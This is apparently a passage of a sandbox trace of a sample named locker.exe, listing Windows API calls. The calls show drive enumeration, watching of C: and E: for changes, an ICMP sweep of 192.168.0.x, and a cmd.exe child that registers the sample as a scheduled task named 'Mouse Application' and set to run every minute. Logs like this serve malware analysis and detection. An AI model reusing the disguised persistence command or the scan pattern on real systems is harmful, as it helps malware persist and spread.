hFindFile=0x4329f8, lpFindFileData=0x316f5ac | out: lpFindFileData=0x316f5ac*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x214, dwReserved1=0x220, cFileName="WindowsRE", cAlternateFileName="茾3뱠B̖ᓮ2뱠B0")) returned 0 [0197.742] GetLastError () returned 0x12 [0197.742] FindClose (in: hFindFile=0x4329f8 | out: hFindFile=0x4329f8) returned 1 [0197.742] FindNextFileW (in: hFindFile=0x432bf8, lpFindFileData=0x316f5ac | out: lpFindFileData=0x316f5ac*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x214, dwReserved1=0x220, cFileName="System Volume Information", cAlternateFileName="")) returned 1 [0197.742] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437288 [0197.742] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x46) returned 0x403c50 [0197.742] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b8e0 | out: hHeap=0x3c0000) returned 1 [0197.742] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437288 | out: hHeap=0x3c0000) returned 1 [0197.742] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437288 [0197.743] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x4372d0 [0197.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="System Volume Information", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0197.743] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cd00 [0197.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="System Volume Information", cchWideChar=25, lpMultiByteStr=0x43cd00, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System Volume Information", lpUsedDefaultChar=0x0) returned 25 [0197.743] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4372d0 | out: hHeap=0x3c0000) returned 1 [0197.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\System Volume Information", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0197.743] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb70 [0197.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\System Volume Information", cchWideChar=28, lpMultiByteStr=0x43cb70, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\System Volume Information", lpUsedDefaultChar=0x0) returned 28 [0197.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\System Volume Information", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0197.743] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cbe8 [0197.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\System Volume Information", cchWideChar=28, lpMultiByteStr=0x43cbe8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\System Volume Information", lpUsedDefaultChar=0x0) returned 28 [0197.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\System Volume Information", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0197.743] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc10 [0197.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\System Volume Information", cchWideChar=28, lpMultiByteStr=0x43cc10, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\System Volume Information", lpUsedDefaultChar=0x0) returned 28 [0197.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\System Volume Information", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0197.743] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cad0 [0197.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="E:\\System Volume Information", cchWideChar=28, lpMultiByteStr=0x43cad0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E:\\System Volume Information", lpUsedDefaultChar=0x0) returned 28 [0197.743] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cad0 | out: hHeap=0x3c0000) returned 1 [0197.743] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc10 | out: hHeap=0x3c0000) returned 1 [0197.743] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cbe8 | out: hHeap=0x3c0000) returned 1 [0197.743] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb70 | out: hHeap=0x3c0000) returned 1 [0197.743] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cd00 | out: hHeap=0x3c0000) returned 1 [0197.744] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437288 | out: hHeap=0x3c0000) returned 1 [0197.744] FindNextFileW (in: hFindFile=0x432bf8, lpFindFileData=0x316f5ac | out: lpFindFileData=0x316f5ac*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x214, dwReserved1=0x220, cFileName="System Volume Information", cAlternateFileName="茾3犈C̖ᓮ2犈C@")) returned 0 [0197.744] GetLastError () returned 0x12 [0197.744] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419df8 | out: hHeap=0x3c0000) returned 1 [0197.744] FindClose (in: hFindFile=0x432bf8 | out: hFindFile=0x432bf8) returned 1 [0197.744] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403c50 | out: hHeap=0x3c0000) returned 1 [0197.744] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41f268 | out: hHeap=0x3c0000) returned 1 [0197.744] GetCurrentProcess () returned 0xffffffff [0197.744] GetCurrentThread () returned 0xfffffffe [0197.744] GetCurrentProcess () returned 0xffffffff [0197.744] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x316fa48, dwDesiredAccess=0x2, bInheritHandle=1, dwOptions=0x0 | out: lpTargetHandle=0x316fa48*=0x5b0) returned 1 [0197.744] CloseHandle (hObject=0x5b0) returned 1 [0197.744] GetCurrentThreadId () returned 0x428 [0197.744] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cbc0 | out: hHeap=0x3c0000) returned 1 [0197.744] GetLastError () returned 0x12 [0197.744] SetLastError (dwErrCode=0x12) [0197.744] FreeLibraryAndExitThread (hLibModule=0x320000, dwExitCode=0x0) [0197.744] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438af8 | out: hHeap=0x3c0000) returned 1 [0197.745] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f50d8 | out: hHeap=0x3c0000) returned 1 Thread: id = 206 os_tid = 0x168 [0197.659] GetLastError () returned 0x0 [0197.660] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x43ff18 [0197.660] SetLastError (dwErrCode=0x0) [0197.660] GetCurrentThreadId () returned 0x168 [0197.660] GetCurrentThreadId () returned 0x168 [0197.660] RtlWakeConditionVariable (in: ConditionVariable=0x43d38c | out: ConditionVariable=0x43d38c) [0197.664] CreateFileA (lpFileName="C:\\" (normalized: "c:"), dwDesiredAccess=0x1, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x3a4 [0197.665] ReadDirectoryChangesW (in: hDirectory=0x3a4, lpBuffer=0x339fafc, nBufferLength=0x110, bWatchSubtree=1, dwNotifyFilter=0x17f, lpBytesReturned=0x339fc94, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffer=0x339fafc, lpBytesReturned=0x339fc94, lpOverlapped=0x0) returned 1 [0197.724] Sleep (dwMilliseconds=0x3e8) Thread: id = 207 os_tid = 0xec8 Thread: id = 208 os_tid = 0xeb8 [0197.738] GetLastError () returned 0x0 [0197.738] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x415aa8 [0197.738] SetLastError (dwErrCode=0x0) [0197.738] GetCurrentThreadId () returned 0xeb8 [0197.739] GetCurrentThreadId () returned 0xeb8 [0197.739] RtlWakeConditionVariable (in: ConditionVariable=0x43d4dc | out: ConditionVariable=0x43d4dc) [0197.768] CreateFileA (lpFileName="E:\\" (normalized: "e:"), dwDesiredAccess=0x1, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x5b0 [0197.792] ReadDirectoryChangesW (hDirectory=0x5b0, lpBuffer=0x391f8b4, nBufferLength=0x110, bWatchSubtree=1, dwNotifyFilter=0x17f, lpBytesReturned=0x391fa4c, lpOverlapped=0x0, lpCompletionRoutine=0x0) Thread: id = 209 os_tid = 0xf3c [0197.851] GetLastError () returned 0x0 [0197.851] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x3f50d8 [0197.852] SetLastError (dwErrCode=0x0) [0197.852] GetCurrentThreadId () returned 0xf3c [0197.852] GetCurrentThreadId () returned 0xf3c [0197.852] RtlWakeConditionVariable (in: ConditionVariable=0x43ceac | out: ConditionVariable=0x43ceac) [0197.854] inet_addr (cp="192.168.0.0") returned 0xa8c0 [0197.855] IcmpCreateFile () Thread: id = 210 os_tid = 0xf34 [0197.983] GetLastError () returned 0x0 [0197.984] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x411920 [0197.984] SetLastError (dwErrCode=0x0) [0197.984] GetCurrentThreadId () returned 0xf34 [0197.984] GetCurrentThreadId () returned 0xf34 [0197.984] RtlWakeConditionVariable (in: ConditionVariable=0x43d2fc | out: ConditionVariable=0x43d2fc) [0197.986] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0197.986] IcmpCreateFile () Thread: id = 211 os_tid = 0xdb0 [0198.062] GetLastError () returned 0x0 [0198.062] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x4149e8 [0198.062] SetLastError (dwErrCode=0x0) [0198.062] GetCurrentThreadId () returned 0xdb0 [0198.062] GetCurrentThreadId () returned 0xdb0 [0198.062] RtlWakeConditionVariable (in: ConditionVariable=0x43ce4c | out: ConditionVariable=0x43ce4c) [0198.065] inet_addr (cp="192.168.0.2") returned 0x200a8c0 [0198.065] IcmpCreateFile () Thread: id = 212 os_tid = 0x12f4 [0198.143] GetLastError () returned 0x0 [0198.143] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x3f75d8 [0198.143] SetLastError (dwErrCode=0x0) [0198.143] GetCurrentThreadId () returned 0x12f4 [0198.143] GetCurrentThreadId () returned 0x12f4 [0198.143] RtlWakeConditionVariable (in: ConditionVariable=0x43cfcc | out: ConditionVariable=0x43cfcc) [0198.146] inet_addr (cp="192.168.0.3") returned 0x300a8c0 [0198.146] IcmpCreateFile () Thread: id = 213 os_tid = 0xf60 [0198.243] GetLastError () returned 0x0 [0198.243] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x43e570 [0198.244] SetLastError (dwErrCode=0x0) [0198.244] GetCurrentThreadId () returned 0xf60 [0198.244] GetCurrentThreadId () returned 0xf60 [0198.244] RtlWakeConditionVariable (in: ConditionVariable=0x43d1dc | out: ConditionVariable=0x43d1dc) [0198.246] inet_addr (cp="192.168.0.4") returned 0x400a8c0 [0198.246] IcmpCreateFile () Thread: id = 214 os_tid = 0xf58 [0198.329] GetLastError () returned 0x0 [0198.329] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x43faf8 [0198.330] SetLastError (dwErrCode=0x0) [0198.330] GetCurrentThreadId () returned 0xf58 [0198.330] GetCurrentThreadId () returned 0xf58 [0198.330] RtlWakeConditionVariable (in: ConditionVariable=0x43ceac | out: ConditionVariable=0x43ceac) [0198.334] inet_addr (cp="192.168.0.5") returned 0x500a8c0 [0198.334] IcmpCreateFile () Thread: id = 215 os_tid = 0xf6c [0198.414] GetLastError () returned 0x0 [0198.414] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x43efb0 [0198.414] SetLastError (dwErrCode=0x0) [0198.414] GetCurrentThreadId () returned 0xf6c [0198.414] GetCurrentThreadId () returned 0xf6c [0198.414] RtlWakeConditionVariable (in: ConditionVariable=0x43d2fc | out: ConditionVariable=0x43d2fc) [0198.417] inet_addr (cp="192.168.0.6") returned 0x600a8c0 [0198.417] IcmpCreateFile () Thread: id = 216 os_tid = 0xea0 [0198.540] GetLastError () returned 0x0 [0198.540] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x364) returned 0x486d20 [0198.541] SetLastError (dwErrCode=0x0) [0198.541] GetCurrentThreadId () returned 0xea0 [0198.541] GetCurrentThreadId () returned 0xea0 [0198.541] RtlWakeConditionVariable (in: ConditionVariable=0x43cffc | out: ConditionVariable=0x43cffc) [0198.541] inet_addr (cp="192.168.0.7") returned 0x700a8c0 [0198.541] IcmpCreateFile () Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c27d000" os_pid = "0x5b0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f8bc" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 10 os_tid = 0x9bc Thread: id = 11 os_tid = 0x7ec Thread: id = 12 os_tid = 0x770 Thread: id = 13 os_tid = 0x7d8 Thread: id = 14 os_tid = 0x698 Thread: id = 15 os_tid = 0x690 Thread: id = 16 os_tid = 0x5fc Thread: id = 17 os_tid = 0x5f8 Thread: id = 18 os_tid = 0x5f4 Thread: id = 19 os_tid = 0x5b4 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1537d000" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1170" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Create /SC MINUTE /TN \"Mouse Application\" /TR \"C:\\Users\\FD1HVy\\Desktop\\locker.exe\" /f" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 20 os_tid = 0x1270 [0100.983] GetModuleHandleA (lpModuleName=0x0) returned 0xf40000 [0100.984] __set_app_type (_Type=0x1) [0100.984] __p__fmode () returned 0x776f3c14 [0100.984] __p__commode () returned 0x776f49ec [0100.984] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf56fd0) returned 0x0 [0100.984] __getmainargs (in: _Argc=0xf6d1a4, _Argv=0xf6d1a8, _Env=0xf6d1ac, _DoWildCard=0, _StartInfo=0xf6d1b8 | out: _Argc=0xf6d1a4, _Argv=0xf6d1a8, _Env=0xf6d1ac) returned 0 [0100.984] _onexit (_Func=0xf58030) returned 0xf58030 [0100.984] _onexit (_Func=0xf58040) returned 0xf58040 [0100.985] _onexit (_Func=0xf58050) returned 0xf58050 [0100.985] _onexit (_Func=0xf58060) returned 0xf58060 [0100.985] _onexit (_Func=0xf58070) returned 0xf58070 [0100.987] _onexit (_Func=0xf58080) returned 0xf58080 [0100.988] GetCurrentThreadId () returned 0x1270 [0100.988] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x1270) returned 0xbc [0100.988] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0100.988] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadUILanguage") returned 0x772e4f70 [0100.988] SetThreadUILanguage (LangId=0x0) returned 0x3110409 [0101.161] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.161] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x335f9e8 | out: phkResult=0x335f9e8*=0x0) returned 0x2 [0101.161] VirtualQuery (in: lpAddress=0x335f9f3, lpBuffer=0x335f9a0, dwLength=0x1c | out: lpBuffer=0x335f9a0*(BaseAddress=0x335f000, AllocationBase=0x3260000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0101.162] VirtualQuery (in: lpAddress=0x3260000, lpBuffer=0x335f9a0, dwLength=0x1c | out: lpBuffer=0x335f9a0*(BaseAddress=0x3260000, AllocationBase=0x3260000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0101.162] VirtualQuery (in: lpAddress=0x3261000, lpBuffer=0x335f9a0, dwLength=0x1c | out: lpBuffer=0x335f9a0*(BaseAddress=0x3261000, AllocationBase=0x3260000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0101.162] VirtualQuery (in: lpAddress=0x3263000, lpBuffer=0x335f9a0, dwLength=0x1c | out: lpBuffer=0x335f9a0*(BaseAddress=0x3263000, AllocationBase=0x3260000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0101.162] VirtualQuery (in: lpAddress=0x3360000, lpBuffer=0x335f9a0, dwLength=0x1c | out: lpBuffer=0x335f9a0*(BaseAddress=0x3360000, AllocationBase=0x3360000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0101.162] GetConsoleOutputCP () returned 0x1b5 [0101.236] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf73850 | out: lpCPInfo=0xf73850) returned 1 [0101.237] SetConsoleCtrlHandler (HandlerRoutine=0xf67260, Add=1) returned 1 [0101.237] _get_osfhandle (_FileHandle=1) returned 0x90 [0101.237] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xf7388c | out: lpMode=0xf7388c) returned 1 [0101.335] _get_osfhandle (_FileHandle=0) returned 0x8c [0101.335] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf73888 | out: lpMode=0xf73888) returned 1 [0101.677] _get_osfhandle (_FileHandle=1) returned 0x90 [0101.678] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0103.318] _get_osfhandle (_FileHandle=1) returned 0x90 [0103.318] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xf73890 | out: lpMode=0xf73890) returned 1 [0104.414] _get_osfhandle (_FileHandle=1) returned 0x90 [0104.414] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0106.437] _get_osfhandle (_FileHandle=0) returned 0x8c [0106.437] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf73894 | out: lpMode=0xf73894) returned 1 [0107.110] _get_osfhandle (_FileHandle=0) returned 0x8c [0107.110] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0108.911] GetEnvironmentStringsW () returned 0x3584c78* [0108.913] GetProcessHeap () returned 0x3580000 [0108.913] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xaca) returned 0x3585750 [0108.914] FreeEnvironmentStringsA (penv="A") returned 1 [0108.914] GetProcessHeap () returned 0x3580000 [0108.914] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0x4) returned 0x3584758 [0108.914] GetEnvironmentStringsW () returned 0x3584c78* [0108.914] GetProcessHeap () returned 0x3580000 [0108.914] RtlAllocateHeap (HeapHandle=0x3580000, Flags=0x8, Size=0xaca) returned 0x3586228 [0108.914] FreeEnvironmentStringsA (penv="A") returned 1 [0108.914] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x335e944 | out: phkResult=0x335e944*=0xcc) returned 0x0 [0108.917] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x0, lpData=0x335e950*=0x60, lpcbData=0x335e948*=0x1000) returned 0x2 [0108.917] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x4, lpData=0x335e950*=0x1, lpcbData=0x335e948*=0x4) returned 0x0 [0108.917] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x0, lpData=0x335e950*=0x1, lpcbData=0x335e948*=0x1000) returned 0x2 [0108.917] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x4, lpData=0x335e950*=0x0, lpcbData=0x335e948*=0x4) returned 0x0 [0108.917] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x4, lpData=0x335e950*=0x40, lpcbData=0x335e948*=0x4) returned 0x0 [0108.917] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x4, lpData=0x335e950*=0x40, lpcbData=0x335e948*=0x4) returned 0x0 [0108.917] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x0, lpData=0x335e950*=0x40, lpcbData=0x335e948*=0x1000) returned 0x2 [0108.917] RegCloseKey (hKey=0xcc) returned 0x0 [0108.917] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x335e944 | out: phkResult=0x335e944*=0xcc) returned 0x0 [0108.918] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x0, lpData=0x335e950*=0x40, lpcbData=0x335e948*=0x1000) returned 0x2 [0108.918] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x4, lpData=0x335e950*=0x1, lpcbData=0x335e948*=0x4) returned 0x0 [0108.918] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x0, lpData=0x335e950*=0x1, lpcbData=0x335e948*=0x1000) returned 0x2 [0108.918] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x4, lpData=0x335e950*=0x0, lpcbData=0x335e948*=0x4) returned 0x0 [0108.918] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x4, lpData=0x335e950*=0x9, lpcbData=0x335e948*=0x4) returned 0x0 [0108.918] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x4, lpData=0x335e950*=0x9, lpcbData=0x335e948*=0x4) returned 0x0 [0108.918] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x335e94c, lpData=0x335e950, lpcbData=0x335e948*=0x1000 | out: lpType=0x335e94c*=0x0, lpData=0x335e950*=0x9, lpcbData=0x335e948*=0x1000) returned 0x2 [0108.918] RegCloseKey (hKey=0xcc) returned 0x0 [0108.918] time (in: timer=0x0 | out: timer=0x0) returned 0x5f9969a7 [0108.918] srand (_Seed=0x5f9969a7) [0108.918] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Create /SC MINUTE /TN \"Mouse Application\" /TR \"C:\\Users\\FD1HVy\\Desktop\\locker.exe\" /f" [0108.918] malloc (_Size=0x4000) returned 0x35021f0 [0108.919] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C schtasks /Create /SC MINUTE /TN \"Mouse Application\" /TR \"C:\\Users\\FD1HVy\\Desktop\\locker.exe\" /f" [0108.919] malloc (_Size=0xffce) returned 0x3780048 [0108.920] ??_V@YAXPAX@Z () returned 0x335f928 [0108.921] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3780048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0108.923] malloc (_Size=0xffce) returned 0x3790020 [0108.923] ??_V@YAXPAX@Z () returned 0x335f6fc [0108.924] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3790020, nSize=0x7fe7 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0108.924] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf6f840, nSize=0x2000 | out: 